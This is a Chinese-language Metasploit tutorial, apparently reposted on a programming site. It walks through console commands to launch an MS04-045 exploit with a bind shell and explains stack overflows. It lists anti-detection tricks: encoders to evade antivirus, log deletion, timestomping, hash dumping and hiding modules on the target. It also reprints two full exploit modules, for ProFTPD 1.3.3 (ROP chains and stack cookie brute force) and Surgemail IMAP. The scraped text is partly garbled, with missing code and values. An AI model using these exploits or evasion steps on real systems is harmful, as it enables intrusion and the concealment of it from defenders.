Metasploit详解 详细图文教程

编程入门 行业动态 更新时间:2024-10-05 05:22:38

Metasploit<a href= style=详解 详细图文教程"/>

Metasploit详解 详细图文教程

  1. 一、metasploit简介

    Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。

  这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。



  1. 二、搭建metasploit环境



  1. 在安装的时候要关闭杀毒软件。否则的话会导致杀毒软件和metasploit冲突,导致安装失败。
  2. 在控制面版——区域和语言选项——选择英文(美国)——高级选项卡中选择英文(美国)。因为在安装的时候,会进行检测,如果属于非英文地区会导致安装失败。






  1. 三、metasploit的使用

Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console模式,第三种是CLI(命令行)模式。原来还提供一种WEB模式,目前已经不再支持。目前这三种模式各有优缺点,建议在MSF console模式中使用。在console中几乎可以使用MSF所提供的所有功能,还可以在console中执行一些其它的外部命令,如ping。

Windows下GUI启动方式。从开始菜单——Metasploit Framework——Metaspliit GUI即可。,如下图所示:


图1:metasploit GUI启动方式


图2:metasploit GUI启动后界面


图3:metasploit console启动后界面





1    show exploits                                如图5所示:

图5:show exploits

2    info exploit/windows/wins/ms04_045_wins        查看其描述信息。如图6所示:


3    use exploit/windows/wins/ms04_045_wins        使用此exploit。如图7所示:


4    show options                                查看相应的选项,如图8所示

图8:show options

5    set RHOST                    设置目标

6    set RPORT    7777                        设置端口

7    set PAYLOAD generic/shell_bind_tcp            设置使用的shellcode

8    exploit                                    执行攻击



  1. 四、Metasploit攻击方法分类



缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上,理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患.操作系统所使用的缓冲区又被称为"堆栈". 在各个操作进程之间,指令会被临时储存在"堆栈"当中,"堆栈"也会出现缓冲区溢出。




随便往缓冲区中填东西造成它溢出一般只会出现"分段错误"(Segmentation fault),而不能达到攻击的目的。最常见的手段是通过制造缓冲区溢出使程序运行一个用户shell,再通过shell执行其它命令。如果该程序属于root且有suid权限的话,攻击者就获得了一个有root权限的shell,可以对系统进行任意操作了。



  1. 在程序的地址空间里安排适当的代码。

  2. 通过适当的初始化寄存器和内存,让程序跳转到入侵者安排的地址空间执行。

每当一个函数调用发生时,调用者会在堆栈中留下一个活动纪录,它包含了函数结束时返回的地址。攻击者通过溢出堆栈中的自动变量,使返回地址指向攻击代码。通过改变程序的返回地址,当函数调用结束时,程序就跳转到攻击者设定的地址,而不是原先的地址。这类的缓冲区溢出被称为堆栈溢出攻击(Stack Smashing Attack),是目前最常用的缓冲区溢出攻击方式。

函数指针可以用来定位任何地址空间。例如:"void (* foo)()"声明了一个返回值为void的函数指针变量foo。所以攻击者只需在任何空间内的函数指针附近找到一个能够溢出的缓冲区,然后溢出这个缓冲区来改变函数指针。在某一时刻,当程序通过函数指针调用函数时,程序的流程就按攻击者的意图实现了。它的一个攻击范例就是在Linux系统下的superprobe程序。






  1. 五、Metasploit架构

Metasploit Framework并不止具有exploit(溢出)收集功能,它使你专注于创建自己的溢出模块或者二次开发。很少的一部分用汇编和C语言实现,其余均由ruby实现。总体架构如图9所示:

图9:metasploit 整体架构

TOOLS        集成了各种实用工具,多数为收集的其它软件

PLUGINS        各种插件,多数为收集的其它软件。直接调用其API,但只能在console模式下工作。

MODULES    目前的Metasploit Framework 的各个模块

MSF core        表示Metasploit Framework core 提供基本的API,并且定义了MSF的框架。并将各个子系统集成在一起。组织比较散乱,不建议更改。

MSF Base        提供了一些扩展的、易用的API以供调用,允许更改

Rex LIBRARIES        Metasploit Framework中所包含的各种库,是类、方法和模块的集合

CLI            表示命令行界面

GUI            图形用户界面

Console        控制台用户界面

Web            网页界面,目前已不再支持

Exploits        定义实现了一些溢出模块,不含payload的话是一个Aux

Payload        由一些可动态运行在远程主机上的代码组成

Nops        用以产生缓冲区填充的非操作性指令

Aux            一些辅助模块,用以实现辅助攻击,如端口扫描工具

Encoders        重新进行编码,用以实现反检测功能等



/ postgresql/lib/plugins主要是postgresql的调试插件和分析插件。还有一些其它的插件,比如ruby插件等。




MSF core定义了整个软件的架构方式,提供了一些基本的API,主要由汇编和C语言来实现,一般情况下不允许直接调用。共有136个汇编文件,7个.h文件,681个.C文件。MSF core组织的比较散乱,不建议更改。


C语言完成的功能比较多,主要是meterpreter的实现和一些工具性的应用,包括ruby相关、内存相关(如memdump.c,属于memdump软件包,用于在DOS和Windows 9x 中dump或copy 4GB以内的地址空间)、网络相关(pcaprub.c,属于libpcap软件包的一部分,是ruby中网络的一部分)、反检测相关(timestomp.c,属于timestomp软件,用于修改文件的时间戳)等。其工具性的应用多是直接来自于其它工具软件。

Meterpreter是MSF core中最重要的一部分,其本身是一个具有多种功能的动态payload,并且可以在运行时动态扩展。它提供了交互式shell的基础。整个运行在内存当中,但它并不创建新的进程,并且使用了加密的通信方法,能有效避免检测。


MSF base分布在很多文件夹当中,定义了大量的实用API,例如svn API、scan API、encode API、更新API、操作API、数据库API、exploit API、GUI API、java API、meterpreter API、php API、snmp API、模块API、ruby API、网络API等……主要供modules下的相关程序进行调用,开发人员也可直接调用其API。


  1. 六、Metasploit二次开发方法













  1. 七、安全软件常用检测方法

1    基于事务发生的时间戳,时间

2    发现可疑文件时,寻找其它具有类似MAC地址的文件,位置

3    根据文件扩展名和签名,文件特征

4    对于系统内文件创建MD5校验,内容

5    查找相应的关键字,关键字

6    对文件的内容进行行为分析,行为分析。安全软件预先知道大量的病毒指令序列,可对文件内容进行检测,如果发现匹配的序列就发出警告。

7    检查当前的进程、端口、文件系统等,状态检查

8 在文件写入磁盘时进行检测。


  1. 八、Metasploit反检测方法


1    在metasploit中使用了meterpreter方法提供一些实用的API。但是meterpreter整个运行在内存当中;但它并不创建新的进程;并且使用了加密的通信方法;并且能够有效的消除入侵证据。整个过程大约在1秒内完成。避免了一些安全软件对于进程的检测。

2    内置了27种encode模块,可对metasploit中的exploit进行编码(encode),以避免反病毒软件检测。27 种encode如下:

Name Rank Description

---- ---- -----------

cmd/generic_sh good Generic Shell Variable Substitution Command Encoder

cmd/ifs low Generic ${IFS} Substitution Command Encoder

cmd/printf_php_mq good printf(1) via PHP magic_quotes Utility Command Encoder

generic/none normal The "none" Encoder

mipsbe/longxor normal XOR Encoder

mipsle/longxor normal XOR Encoder

php/base64 great PHP Base64 encoder

ppc/longxor normal PPC LongXOR Encoder

ppc/longxor_tag normal PPC LongXOR Encoder

sparc/longxor_tag normal SPARC DWORD XOR Encoder

x64/xor normal XOR Encoder

x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder

x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder

x86/avoid_utf8_tolower manual Avoid UTF8/tolower

x86/call4_dword_xor normal Call+4 Dword XOR Encoder

x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder

x86/context_stat manual stat(2)-based Context Keyed Payload Encoder

x86/context_time manual time(2)-based Context Keyed Payload Encoder

x86/countdown normal Single-byte XOR Countdown Encoder

x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder

x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder

x86/nonalpha low Non-Alpha Encoder

x86/nonupper low Non-Upper Encoder

x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder

x86/single_static_bit manual Single Static Bit

x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder

x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder


3    内置日志删除模块,可以删除相应的事务日志,以避免检测。

4    metasploit framework中集成了timestomp(用于修改文件时间戳)、slacker(用于隐藏文件)、SAM Juicer(meterpreter的一部分,用于从SAM中转储哈希)、伪造MAC地址等工具用于消除入侵证据。

5 避免使用一些明显具有木马或病毒含义的名子或关键字,如"灰鸽子"等肯定会引起安全软件的注意。

6     所开发的模块尽量放在目标机多个存储位置,以避免所有的模块被安全软件一次清除

7     攻击安全软件,使安全软件失效,目前还未开发。


  1. 九、一般攻击的过程

1 获得EIP。IP是指令寄存器,存放当前指令的下一条指令的地址,CPU该执行哪条指令就是通过IP来指示的。EIP为32位机的指令寄存器,存放的是相对地址,也就是基于段基址的偏移值。CPU的ESP寄存器存放当前线程的栈顶指针,EBP存放当前线程的栈底指针。






4 添加用户或其它


  1. 十、恶意软件分类

1     特洛伊木马(Trojan horse)潜茂在其它有用的软件中实施恶意操作的指令。通常将编写程序时就已经安装的恶意指令称为特洛伊木马,在程序编写完后加入的恶意代码称为病毒。

2 病毒(virus) 在执行之后能将自身植入到其它程序中的指令。病毒安装在其它程序的方式:替换任意指令,比如在X处的指令替换成跳转到内存的其他某个地方Y,然后在Y处执行病毒代码,然后在病毒代码后加入口令,使病毒代码执行完后跳到X+1处。

  1. 蠕虫(worm)能自我复制并通过网络将自己安装在其他计算机上的程序。
  2. 陷门(trapdoor)故意在程序中加入未开放的入口,经常用于调试程序,也可以作为安全漏洞使用。
  3. 逻辑炸弹(logic bomb)在未来根据特定条件启动的恶意指令,比如在特定的时间启动。
  4. 僵尸(zombie) 在其他计算机上安装的恶意代码,可通过远程控制这种代码的方式实施攻击,由于攻击来自其它主机,这种方式更难追踪。攻击者经常安装大量的僵尸以制造大量的网络流量。
  1. 十一、exploits详细解析之proftp_telnet_iac.rb





CheckCode::Safe                目标机安全,攻击可能无效

CheckCode::Detected             目标机提供了相应的服务

CheckCode::Appears             目标机已经被感染

CheckCode::Vulnerable        目标机易受攻击

CheckCode::Unsupported        本exploit对目标机不可用




# $Id: proftp_telnet_iac.rb 11208 2010-12-02 21:10:03Z jduck $



# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# /








require 'msf/core'





class Metasploit3 < Msf::Exploit::Remote

    Rank = GreatRanking

    #include Msf::Exploit::Remote::Ftp




    include Msf::Exploit::Remote::Tcp


    def initialize(info = {})


            'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)',

            'Description' => %q{

                    This module exploits a stack-based buffer overflow in versions of ProFTPD

                server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a

                large number of Telnet IAC commands, an attacker can corrupt memory and

                execute arbitrary code.


                The Debian Squeeze version of the exploit uses a little ROP stub to indirectly

                transfer the flow of execution to a pool buffer (the cmd_rec "res" in



                The Ubuntu version uses a full-blow ROP to mmap RWX memory, copy a small stub

                to it, and execute the stub. The stub then copies the remainder of the payload

                in and executes it.


                NOTE: Most Linux distributions either do not ship a vulnerable version of

                ProFTPD, or they ship a version compiled with stack smashing protection.


                Although SSP significantly reduces the probability of a single attempt

                succeeding, it will not prevent exploitation. Since the daemon forks in a

                default configuration, the cookie value will remain the same despite

                some attemtps failing. By making repeated requests, an attacker can eventually

                guess the cookie value and exploit the vulnerability.


                The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness

                and could allow exploitation in semi-reasonable amount of time.


            'Author' => [ 'jduck' ],

            'Version' => '$Revision: 11208 $',

            'References' =>


                    ['CVE', '2010-4221'],

                    ['OSVDB', '68985'],

                    ['BID', '44562']


            'DefaultOptions' =>


                    'EXITFUNC' => 'process',

                    'PrependChrootBreak' => true


            'Privileged' => true,

            'Payload' =>


                    'Space' => 4096,    #定义所需空间大小

                    # NOTE: \xff are avoided here so we can control the number of them being sent.

                    'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\xff",

                    'DisableNops'    => 'True',


            'Platform' => [ 'linux', ],

            'Targets' =>



                # Automatic targeting via fingerprinting


                [ 'Automatic Targeting', { 'auto' => true } ],



                # This special one comes first since we dont want its index changing.


                [    'Debug',


                        'IACCount' => 8192, # should cause crash writing off end of stack

                        'Offset' => 0,

                        'Ret' => 0x41414242,

                        'Writable' => 0x43434545





                # specific targets



                # NOTE: this minimal rop works most of the time, but it can fail

                # if the proftpd pool memory is in a different order for whatever reason...

                [ 'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1',


                        'IACCount' => 4096+16,

                        'Offset' => 0x102c-4,

                        # NOTE: All addresses are from the proftpd binary

                        'Ret' => 0x805a547, # pop esi / pop ebp / ret

                        'Writable' => 0x80e81a0, # .data

                        'RopStack' =>


                                # Writable is here

                                0xcccccccc, # unused

                                0x805a544, # mov eax,esi / pop ebx / pop esi / pop ebp / ret

                                0xcccccccc, # becomes ebx

                                0xcccccccc, # becomes esi

                                0xcccccccc, # becomes ebp

                                # quadruple deref the res pointer :)

                                0x8068886, # mov eax,[eax] / ret

                                0x8068886, # mov eax,[eax] / ret

                                0x8068886, # mov eax,[eax] / ret

                                0x8068886, # mov eax,[eax] / ret

                                # skip the pool chunk header

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                0x805bd8e, # inc eax / adc cl, cl / ret

                                # execute the data :)

                                0x0805c26c, # jmp eax





                # For the version compiled with symbols :)

                [ 'ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)',


                        'IACCount' => 4096+16,

                        'Offset' => 0x1028-4,

                        # NOTE: All addresses are from the proftpd binary

                        'Writable' => 0x80ec570, # .data

                        'Ret' => 0x80d78c2, # pop esi / pop ebp / ret

                        'RopStack' =>


                                # Writable is here

                                #0x0808162a, # jmp esp (works w/esp fixup)

                                0xcccccccc, # unused becomes ebp

                                0x80d78c2, # mov eax,esi / pop esi / pop ebp / ret

                                0xcccccccc, # unused becomes esi

                                0xcccccccc, # unused becomes ebp

                                # quadruple deref the res pointer :)

                                0x806a915, # mov eax,[eax] / pop ebp / ret

                                0xcccccccc, # unused becomes ebp

                                0x806a915, # mov eax,[eax] / pop ebp / ret

                                0xcccccccc, # unused becomes ebp

                                0x806a915, # mov eax,[eax] / pop ebp / ret

                                0xcccccccc, # unused becomes ebp

                                0x806a915, # mov eax,[eax] / pop ebp / ret

                                0xcccccccc, # unused becomes ebp

                                # skip the pool chunk header

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                0x805d6a9, # inc eax / adc cl, cl / ret

                                # execute the data :)

                                0x08058de6, # jmp eax





                [ 'ProFTPD 1.3.2c Server (Ubuntu 10.04)',


                        'IACCount' => 1018,

                        'Offset' => 0x420,

                        'CookieOffset' => -0x20,

                        'Writable' => 0x80db3a0, # becomes esi (beginning of .data)

                        'Ret' => 0x805389b, # pop esi / pop ebp / ret

                        'RopStack' =>


                                0xcccccccc, # becomes ebp


                                0x8080f04, # pop eax / ret

                                0x80db330, # becomes eax (GOT of mmap64)


                                0x806a716, # mov eax, [eax] / ret

                                0x805dd5c, # jmp eax

                                0x80607b2, # add esp, 0x24 / pop ebx / pop ebp / ret

                                # mmap args

                                0, 0x20000, 0x7, 0x22, 0xffffffff, 0,

                                0, # unused

                                0xcccccccc, # unused

                                0xcccccccc, # unused

                                0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx

                                0xcccccccc, # becomes ebp


                                # note, ebx gets fixed above :)

                                # 0xfe in 'ah' doesn't matter since we have more than enough space.

                                # now, load an instruction to store to eax

                                0x808b542, # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret

                                # becomes edx - mov [eax+ebp*4]; ebx / ret



                                # store it :)

                                0x805c2d0, # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret

                                0xcccccccc, # unused

                                0xcccccccc, # unused

                                0xcccccccc, # unused

                                0xcccccccc, # unused

                                0xcccccccc, # becomes ebx

                                0xcccccccc, # becomes esi

                                0xcccccccc, # becomes ebp


                                # Copy the following stub:

                                #"\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df]

                                #"\x8d\x78\x12" # lea edi, [eax+0x12]

                                #"\x6a\x7f" # push 0x7f

                                #"\x59"     # pop ecx

                                #"\xf2\xa5" # rep movsd


                                0x80607b5, # pop ebx / pop ebp / ret

                                0xfb2124b4, # becomes ebx

                                1, # becomes ebp

                                0x805dd5c, # jmp eax


                                0x80607b5, # pop ebx / pop ebp / ret

                                0x788dffff, # becomes ebx

                                2, # becomes ebp

                                0x805dd5c, # jmp eax


                                0x80607b5, # pop ebx / pop ebp / ret

                                0x597f6a12, # becomes ebx

                                3, # becomes ebp

                                0x805dd5c, # jmp eax


                                0x80607b5, # pop ebx / pop ebp / ret

                                0x9090a5f2, # becomes ebx

                                4, # becomes ebp

                                0x805dd5c, # jmp eax


                                0x80607b5, # pop ebx / pop ebp / ret

                                0x8d909090, # becomes ebx

                                0, # becomes ebp

                                0x805dd5c, # jmp eax


                                # hopefully we dont get here







            'DefaultTarget' => 0,

            'DisclosureDate' => 'Nov 1 2010'))





            ], self.class )



    ##定义了check 方法,检查目标机

    def check

        # NOTE: We don't care if the login failed here...

        ret = connect        #连接目标机,connect为内置命令

        banner = sock.get_once    #获取目标机标识


        # We just want the banner to check against our targets..

        print_status("FTP Banner: #{banner.strip}")    #打印目标机标识状态


        status = CheckCode::Safe            #先设定目标机安全

        if banner =~ /ProFTPD (1\.3\.[23][^ ])/i    #查看其标识是否匹配特定的软件

            ver = $1

            maj,min,rel = ver.split('.')

            relv = rel.slice!(0,1)

            case relv

            when '2'

                if rel.length > 0

                    if rel[0,2] == 'rc'

                        if rel[2,rel.length].to_i >= 3

                            status = CheckCode::Vulnerable



                        status = CheckCode::Vulnerable



            when '3'

                # 1.3.3+ defaults to vulnerable (until >= 1.3.3c)

                status = CheckCode::Vulnerable

                if rel.length > 0

                    if rel[0,2] != 'rc' and rel[0,1] > 'b'

                        status = CheckCode::Safe






        disconnect        #断开连接

        return status        #返回状态



    def exploit


        banner = sock.get_once


        # Use a copy of the target

        mytarget = target


        if (target['auto'])

            mytarget = nil


            print_status("Automatically detecting the target...")

            if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then

                print_status("FTP Banner: #{banner.strip}")

                version = m[1]


                raise RuntimeError, "No matching target"



            regexp = Regexp.escape(version)

            self.targets.each do |t|

                if ( =~ /#{regexp}/) then

                    mytarget = t





            if (not mytarget)

                raise RuntimeError, "No matching target"



            print_status("Selected Target: #{}")


            print_status("Trying target #{}...")

            if banner

                print_status("FTP Banner: #{banner.strip}")



        #puts "attach and press any key"; bleh = $stdin.gets

        buf = ''

        buf << 'SITE '

        #buf << "\xcc"

        if mytarget['CookieOffset']

            buf << "\x8d\xa0\xfc\xdf\xff\xff" # lea esp, [eax-0x2004]


        buf << payload.encoded


        # The number of characters left must be odd at this point.

        buf << rand_text(1) if (buf.length % 2) == 0

        buf << "\xff" * (mytarget['IACCount'] - payload.encoded.length)


        buf << rand_text_alphanumeric(mytarget['Offset'] - buf.length)

        addrs = [





        if mytarget['RopStack']

            addrs << mytarget['RopStack'].map { |e|

                if e == 0xcccccccc








        # Make sure we didn't introduce instability

        addr_badchars = "\x09\x0a\x0b\x0c\x20"

        if idx = Rex::Text.badchar_index(addrs, addr_badchars)

            raise RuntimeError, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx])



        buf << addrs

        buf << "\r\n"


        # In the case of Ubuntu, the cookie has 24-bits of entropy. Further more, it

        # doesn't change while proftpd forks children. Therefore, we can try forever

        # and eventually guess it correctly.


        # NOTE: if the cookie contains one of our bad characters, we're SOL.


        if mytarget['CookieOffset']

            print_status("!!! Attempting to bruteforce the cookie value! This can takes days. !!!")



            max = 0xffffff00

            off = mytarget['Offset'] + mytarget['CookieOffset']

            cookie = last_cookie = 0

            #cookie = 0x17ccd600

            start =

            last = start - 10

            while not session_created?

                now =

                if (now - last) >= 10

                    perc = (cookie * 100) / max

                    qps = ((cookie - last_cookie) >> 8) / 10.0

                    print_status("%.2f%% complete, %.2f attempts/sec - Trying: 0x%x" % [perc, qps, cookie])

                    last = now

                    last_cookie = cookie


                sd = connect(false)


                buf[off, 4] = [cookie].pack('V')



                cookie += 0x100

                break if cookie > max


            if not session_created?

                raise RuntimeError, "Unable to guess the cookie value, sorry :-/"













require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Imap

def initialize(info = {})


'Name' => 'Surgemail 3.8k4-4 IMAPD LIST Buffer Overflow',

'Description' => %q{

This module exploits a stack overflow in the Surgemail IMAP Server

version 3.8k4-4 by sending an overly long LIST command. Valid IMAP

account credentials are required.


'Author' => [ 'ryujin' ],

'License' => MSF_LICENSE,

'Version' => '$Revision: 1 $',

'References' =>


[ 'BID', '28260' ],

[ 'CVE', '2008-1498' ],

[ 'URL', '' ],


'Privileged' => false,

'DefaultOptions' =>


'EXITFUNC' => 'thread',


'Payload' =>


'Space' => 10351,

'EncoderType' => Msf::Encoder::Type::AlphanumMixed,

'DisableNops' => true,

'BadChars' => "\x00"


'Platform' => 'win',

'Targets' =>


[ 'Windows Universal', { 'Ret' => "\x7e\x51\x78" } ], # p/p/r 0x0078517e


'DisclosureDate' => 'March 13 2008',

'DefaultTarget' => 0))


def check



if (banner and banner =~ /(Version 3.8k4-4)/)

return Exploit::CheckCode::Vulnerable


return Exploit::CheckCode::Safe


def exploit

connected = connect_login

nopes = "\x90"*(payload_space-payload.encoded.length) # to be fixed with make_nops()

sjump = "\xEB\xF9\x90\x90" # Jmp Back

njump = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby ;)

evil = nopes + payload.encoded + njump + sjump + [target.ret].pack("A3")

print_status("Sending payload")

sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"












图13:使用新增加的exploit surgemail




Metasploit详解 详细图文教程

本文发布于:2024-03-23 20:02:08,感谢您对本站的认可!
本文标签:详解   图文   教程   详细   Metasploit


评论列表 (有 0 条评论)


编程频道|电子爱好者 - 技术资讯及电子产品介绍!